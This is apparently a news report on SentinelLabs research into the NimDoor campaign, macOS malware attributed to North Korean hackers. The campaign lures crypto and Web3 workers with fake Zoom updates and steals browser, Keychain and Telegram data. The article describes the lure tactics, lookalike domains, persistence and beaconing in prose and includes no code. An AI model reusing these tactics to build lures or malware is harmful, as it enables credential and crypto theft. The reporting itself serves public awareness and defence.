A new cyberattack campaign orchestrated by North Korean hackers has been uncovered, with cybersecurity experts revealing a calculated malware operation targeting the Web3 and cryptocurrency sectors. Dubbed the NimDoor malware campaign, this effort combines deceptive social engineering with advanced coding practices, specifically aiming at users of macOS.
Fake Zoom Updates Conceal Malicious Payloads
According to findings from SentinelLabs, the attackers initially approach their targets by impersonating familiar contacts on messaging platforms such as Telegram. After establishing trust, victims are coaxed into scheduling meetings via Calendly and are then sent links to download what appears to be a necessary Zoom update. These spoofed update prompts are embedded within links that mimic legitimate Zoom URLs, leveraging domains crafted to resemble genuine services. Examples include misleading addresses such as support.us05web-zoom.forum and support.us05web-zoom.cloud, which closely resemble the authentic Zoom domain format.
The malicious files, masquerading as Zoom support tools, contain cleverly structured programs padded with vast amounts of empty code. This padding is designed to obscure the real function of the files and create the illusion of standard, non-threatening software. Hidden within these bloated files are merely three lines of code responsible for downloading and executing additional malicious components from servers under the attackers’ control.
Broad Campaign with Customized Domains
Researchers noted that the operation appears to be extensive, with multiple domains concurrently targeting various victims. Each domain is customized for individual targets, suggesting a broad and coordinated campaign. SentinelLabs highlighted how the attackers’ attempt to avoid scrutiny through deliberate typos in file names—such as using “Zook SDK Update” instead of the correct spelling—ended up aiding researchers in tracking the campaign’s activities.
Upon execution, the infected program redirects victims to a legitimate Zoom page, concealing the background deployment of malware. This tactic is intended to reassure users that a routine update is taking place, while the malware quietly activates its attack modules.
Dual-Pronged Attack Strategy
Once installed, the NimDoor malware follows a two-path attack strategy. The first component focuses on extracting sensitive data such as login credentials, browsing history, and chat logs from popular web browsers like Chrome, Firefox, Edge, Brave, and Arc. It also accesses system-level credentials stored in the macOS Keychain and tracks user command histories to analyze previous system activities.
The second component establishes long-term system access by embedding itself within hidden background processes. Telegram messaging data becomes a particular focus, with the malware retrieving both encrypted message files and the decryption keys necessary to read them offline.
All collected data is first stored in hidden folders under misleading file names to evade suspicion and is later transferred to attacker-controlled servers via encrypted communication channels. These transmission techniques are crafted to resemble routine web traffic, further enhancing the malware’s ability to remain undetected.
Advanced Evasion and Persistent Access
Built using programming languages like Nim and C++, the malware poses significant challenges for conventional security software. Its design takes advantage of macOS features to camouflage its presence and sustain access even after system reboots or user attempts to delete the infection.
Whenever a user tries to shut down the malware or restart the system, the software responds by creating fresh copies of itself in concealed directories. This self-replication method allows it to reinstall automatically, essentially thwarting manual removal efforts.
Deceptive naming tactics further complicate detection. For example, the malware may generate folders that appear linked to trusted services such as Google, albeit with subtle misspellings that users might overlook. These files are then configured to launch on startup, ensuring continuous operation.
Another notable feature is a monitoring mechanism that communicates with the hackers’ servers every 30 seconds. This program collects real-time data on system activity and awaits remote commands. To further elude detection, it includes a built-in delay of 10 minutes before activating fully, mimicking the behavior of sluggish but benign software.
Significant Risk to Crypto and Web3 Ecosystem
The level of stealth and resilience embedded in the NimDoor malware has raised concerns across the cybersecurity community. Removing it often requires specialized technical intervention, beyond the capabilities of the average user. With its focus on stealing encrypted communications, financial data, and personal credentials, the campaign poses a significant threat to professionals and organizations operating in the blockchain and digital asset space.
